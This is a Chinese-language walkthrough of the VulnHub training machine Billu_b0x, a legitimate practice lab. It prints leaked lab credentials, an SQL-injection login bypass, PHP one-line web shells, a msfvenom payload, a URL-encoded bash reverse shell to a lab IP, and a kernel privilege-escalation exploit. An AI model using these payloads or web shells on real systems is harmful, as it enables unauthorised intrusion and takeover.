VulnHub渗透测试实战靶场 - Billu_b0x

环境下载

戳此进行环境下载

Billu_b0x靶机搭建

将下载好的靶机环境,用VMware导入,将靶机和攻击机的网络连接设置为NAT模式

VulnHub渗透测试实战靶场 - Billu_b0x
VulnHub渗透测试实战靶场 - Billu_b0x

渗透测试

VulnHub渗透测试实战靶场 - Billu_b0x

使用Nmap扫描VMware Network Adapter VMnet8网卡的NAT网段C段IP:sudo nmap -sP 192.168.23.1/24

VulnHub渗透测试实战靶场 - Billu_b0x

确定目标ip地址:192.168.23.130
用Nmap进行深度扫描:sudo nmap -sS -A 192.168.23.130 -oN billu.txt
发现目标开放了22端口和80端口

VulnHub渗透测试实战靶场 - Billu_b0x

VulnHub渗透测试实战靶场 - Billu_b0x

漏洞挖掘思路:

  • SQL注入:首页提示注入,想办法注入成功
  • 暴破目录:用DirBuster暴破,看是否有新网页,找新漏洞
  • 漏洞扫描:暴破的新网页,送进AWVS或APPScan扫漏洞
  • 手动挖掘:暴破的新页面,通过Firefox挂burp代理,在burp中观察Request和Response包,手动找漏洞
  • 查看每个网页的源码,看是否有提示
  • 如得到用户名,密码,尝试登录ssh,如能连接上,无需反弹shell了

先用sqlmap进行测试:sqlmap -u http://192.168.23.130/ --data "un=admin&ps=admin&login=let%27s+login" --level 3 --dbms mysql,发现并没有什么效果

VulnHub渗透测试实战靶场 - Billu_b0x

使用dirsearch扫描一下网站目录:python3 dirsearch.py -u 192.168.23.130 -e *.php,发现存在挺多200的页面

VulnHub渗透测试实战靶场 - Billu_b0x

测试后发现在http://192.168.23.130/test.php存在文件包含

VulnHub渗透测试实战靶场 - Billu_b0x

利用该漏洞,查看一下之前探测网站目录得到的php文件内容

  • c.php
<?php #header( 'Z-Powered-By:its chutiyapa xD' ); header('X-Frame-Options: SAMEORIGIN'); header( 'Server:testing only' ); header( 'X-Powered-By:testing only' );  ini_set( 'session.cookie_httponly', 1 );  $conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");  // Check connection if (mysqli_connect_errno())   {   echo "connection failed ->  " . mysqli_connect_error();   }  ?> 
  • add.php
<?php   echo '<form  method="post" enctype="multipart/form-data">     Select image to upload:     <input type="file" name=image> 	<input type=text name=name value="name"> 	<input type=text name=address value="address"> 	<input type=text name=id value=1337 >     <input type="submit" value="upload" name="upload"> </form>';    ?> 
  • index.php
<?php session_start();  include('c.php'); include('head.php'); if(@$_SESSION['logged']!=true) { 	$_SESSION['logged']=''; 	 }  if($_SESSION['logged']==true &&  $_SESSION['admin']!='') { 	 	echo "you are logged in :)"; 	header('Location: panel.php', true, 302); } else { echo '<div align=center style="margin:30px 0px 0px 0px;"> <font size=8 face="comic sans ms">--==[[ billu b0x ]]==--</font>  <br><br> Show me your SQLI skills <br> <form method=post> Username :- <Input type=text name=un> &nbsp Password:- <input type=password name=ps> <br><br> <input type=submit name=login value="let's login">'; } if(isset($_POST['login'])) { 	$uname=str_replace(''','',urldecode($_POST['un'])); 	$pass=str_replace(''','',urldecode($_POST['ps'])); 	$run='select * from auth where  pass=''.$pass.'' and uname=''.$uname.'''; 	$result = mysqli_query($conn, $run); if (mysqli_num_rows($result) > 0) {  $row = mysqli_fetch_assoc($result); 	   echo "You are allowed<br>"; 	   $_SESSION['logged']=true; 	   $_SESSION['admin']=$row['username']; 	    	 header('Location: panel.php', true, 302);     } else { 	echo "<script>alert('Try again');</script>"; } 	 } echo "<font size=5 face="comic sans ms" style="left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;">B0X Powered By <font color=#ff9933>Pirates</font> ";  ?> 
  • test.php
?php   function file_download($download) { 	if(file_exists($download)) 				{ 					header("Content-Description: File Transfer");  					 					header('Content-Transfer-Encoding: binary'); 					header('Expires: 0'); 					header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); 					header('Pragma: public'); 					header('Accept-Ranges: bytes'); 					header('Content-Disposition: attachment; filename="'.basename($download).'"');  					header('Content-Length: ' . filesize($download)); 					header('Content-Type: application/octet-stream');  					ob_clean(); 					flush(); 					readfile ($download); 				} 				else 				{ 				echo "file not found";	 				} 	 }  if(isset($_POST['file'])) { file_download($_POST['file']); } else{  echo ''file' parameter is empty. Please provide file path in 'file' parameter '; } 
  • panel.php
<?php session_start();  include('c.php'); include('head2.php'); if(@$_SESSION['logged']!=true ) { 		header('Location: index.php', true, 302); 		exit(); 	 }    echo "Welcome to billu b0x "; echo '<form method=post style="margin: 10px 0px 10px 95%;"><input type=submit name=lg value=Logout></form>'; if(isset($_POST['lg'])) { 	unset($_SESSION['logged']); 	unset($_SESSION['admin']); 	header('Location: index.php', true, 302); } echo '<hr><br>';  echo '<form method=post>  <select name=load>     <option value="show">Show Users</option> 	<option value="add">Add User</option> </select>    &nbsp<input type=submit name=continue value="continue"></form><br><br>'; if(isset($_POST['continue'])) { 	$dir=getcwd(); 	$choice=str_replace('./','',$_POST['load']); 	 	if($choice==='add') 	{        		include($dir.'/'.$choice.'.php'); 			die(); 	} 	         if($choice==='show') 	{          		include($dir.'/'.$choice.'.php'); 		die(); 	} 	else 	{ 		include($dir.'/'.$_POST['load']); 	} 	 }   if(isset($_POST['upload'])) { 	 	$name=mysqli_real_escape_string($conn,$_POST['name']); 	$address=mysqli_real_escape_string($conn,$_POST['address']); 	$id=mysqli_real_escape_string($conn,$_POST['id']); 	 	if(!empty($_FILES['image']['name'])) 	{ 		$iname=mysqli_real_escape_string($conn,$_FILES['image']['name']); 	$r=pathinfo($_FILES['image']['name'],PATHINFO_EXTENSION); 	$image=array('jpeg','jpg','gif','png'); 	if(in_array($r,$image)) 	{ 		$finfo = @new finfo(FILEINFO_MIME);  	$filetype = @$finfo->file($_FILES['image']['tmp_name']); 		if(preg_match('/image/jpeg/',$filetype )  || preg_match('/image/png/',$filetype ) || preg_match('/image/gif/',$filetype )) 				{ 					if (move_uploaded_file($_FILES['image']['tmp_name'], 'uploaded_images/'.$_FILES['image']['name'])) 							 { 							  echo "Uploaded successfully "; 							  $update='insert into users(name,address,image,id) values(''.$name.'',''.$address.'',''.$iname.'', ''.$id.'')';  							 mysqli_query($conn, $update); 							   							} 				} 			else 			{ 				echo "<br>i told you dear, only png,jpg and gif file are allowed"; 			} 	} 	else 	{ 		echo "<br>only png,jpg and gif file are allowed"; 		 	} }   }  ?> 
  • /etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false messagebus:x:103:106::/var/run/dbus:/bin/false whoopsie:x:104:107::/nonexistent:/bin/false landscape:x:105:110::/var/lib/landscape:/bin/false sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin ica:x:1000:1000:ica,,,:/home/ica:/bin/bash 

审计得到的有关信息可以发现:

  • /etc/passwd中,发现1个id 1000的账号ica,ssh连接的用户名可以是ica或root
  • c.php中发现mysql连接用户名:billu,密码:b0x_billu以及数据库名:ica_lab

通过得到的mysql密码登录phpmyadmin,尝试后发现无法登录(原因在后面阐述)

VulnHub渗透测试实战靶场 - Billu_b0x

重装环境之后再次用之前得到的信息登录,在ica_lab数据库的auth表中,找到web登录的用户名:biLLu,密码:hEx_it

VulnHub渗透测试实战靶场 - Billu_b0x

getshell

获得root权限

继续暴破phpmy目录,文件包含phpmyadmin配置文件,由于phpmyadmin的默认的配置文件是config.inc.php,用之前文件包含的漏洞得到phpmyadmin的默认的配置文件的内容,得到用户为root,密码为roottoor

VulnHub渗透测试实战靶场 - Billu_b0x
<?php /* Servers configuration */ $i = 0;  /* Server: localhost [1] */ $i++; $cfg['Servers'][$i]['verbose'] = 'localhost'; $cfg['Servers'][$i]['host'] = 'localhost'; $cfg['Servers'][$i]['port'] = ''; $cfg['Servers'][$i]['socket'] = ''; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['extension'] = 'mysqli'; $cfg['Servers'][$i]['auth_type'] = 'cookie'; $cfg['Servers'][$i]['user'] = 'root'; $cfg['Servers'][$i]['password'] = 'roottoor'; $cfg['Servers'][$i]['AllowNoPassword'] = true;  /* End of servers configuration */  $cfg['DefaultLang'] = 'en-utf-8'; $cfg['ServerDefault'] = 1; $cfg['UploadDir'] = ''; $cfg['SaveDir'] = '';   /* rajk - for blobstreaming */ $cfg['Servers'][$i]['bs_garbage_threshold'] = 50; $cfg['Servers'][$i]['bs_repository_threshold'] = '32M'; $cfg['Servers'][$i]['bs_temp_blob_timeout'] = 600; $cfg['Servers'][$i]['bs_temp_log_threshold'] = '32M'; ?> 

用xshell登录,得到root权限
之前mysql登不上检测后发现mysql状态为:mysql stop/waiting,推测mysql被之前的高线程目录暴破、扫描导致故障

获得非root权限

  • 方式一:用phpmyadmin中得到的web页面登录账号密码登录
VulnHub渗透测试实战靶场 - Billu_b0x
  • 方式二:审计index.php源码,发现以下过滤规则:
$uname=str_replace(''','',urldecode($_POST['un'])); $pass=str_replace(''','',urldecode($_POST['ps'])); 

str_replace的作用是将字符串' 替换为空,因此构造SQL注入登录payload时,必须含有'字符串,否则会报错,urldecode的作用是将输入解码,所以可以用Payload:用户名密码均为' or 1=1 -- ',成功登入web页面

VulnHub渗透测试实战靶场 - Billu_b0x

点击add user进入添加账号界面,这是一个图片上传漏洞点,利用图片上传和文件包含获得shell
查看之前利用文件包含漏洞获得的panel.php源码,发现panel.php存在本地文件包含漏洞

if(isset($_POST['continue'])) { 	$dir=getcwd(); 	$choice=str_replace('./','',$_POST['load']); 	 	if($choice==='add') 	{        		include($dir.'/'.$choice.'.php'); 			die(); 	} 	         if($choice==='show') 	{          		include($dir.'/'.$choice.'.php'); 		die(); 	} 	else 	{ 		include($dir.'/'.$_POST['load']); 	} 	 } 

用msf制作一个php马用来反弹shell:msfvenom -p php/meterpreter/reverse_VulnHub渗透测试实战靶场 - Billu_b0x
VulnHub渗透测试实战靶场 - Billu_b0x

msf起一个监听,利用burpsuite发包,成功获得反弹的shell,但是测试后发现输入的命令没有用(不知道为啥)

VulnHub渗透测试实战靶场 - Billu_b0x

重新上传一个马,这次采用一句话马:<?php system($_POST['cmd']);?>,安装上面的思路用burpsuite发包

VulnHub渗透测试实战靶场 - Billu_b0x

用bash反弹shell,将命令echo "bash -i >& /dev/tcp/192.168.23.128/1234 0>&1" | bash进行url编码%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%32%33%2e%31%32%38%2f%31%32%33%34%20%30%3e%26%31%22%20%7c%20%62%61%73%68,起一个监听,再次发包

VulnHub渗透测试实战靶场 - Billu_b0x

提权

将shell升级为 tty,得到一个交互式的shell:python -c 'import pty;pty.spawn("/bin/bash")'
查看系统内核版本:uanme -acat /etc/issue

VulnHub渗透测试实战靶场 - Billu_b0x

根据得到的内核相关信息,寻找可利用的exp:https://www.exploit-db.com/exploits/37292

VulnHub渗透测试实战靶场 - Billu_b0x

为了方便上传exp,在文件上传目录uploaded_images为写一个马:

echo '<?php eval($_POST['d1no']);?>' >> d1no.php 
VulnHub渗透测试实战靶场 - Billu_b0x

利用蚁剑将exp上传上去,执行操作

  1. 赋予执行权限:chmod 777 37292.c
  2. 编译exp:gcc 37292.c -o exp
  3. 执行exp,提权至root
VulnHub渗透测试实战靶场 - Billu_b0x

版权声明:玥玥 发表于 2021-08-06 10:37:45。
转载请注明:VulnHub渗透测试实战靶场 - Billu_b0x | 女黑客导航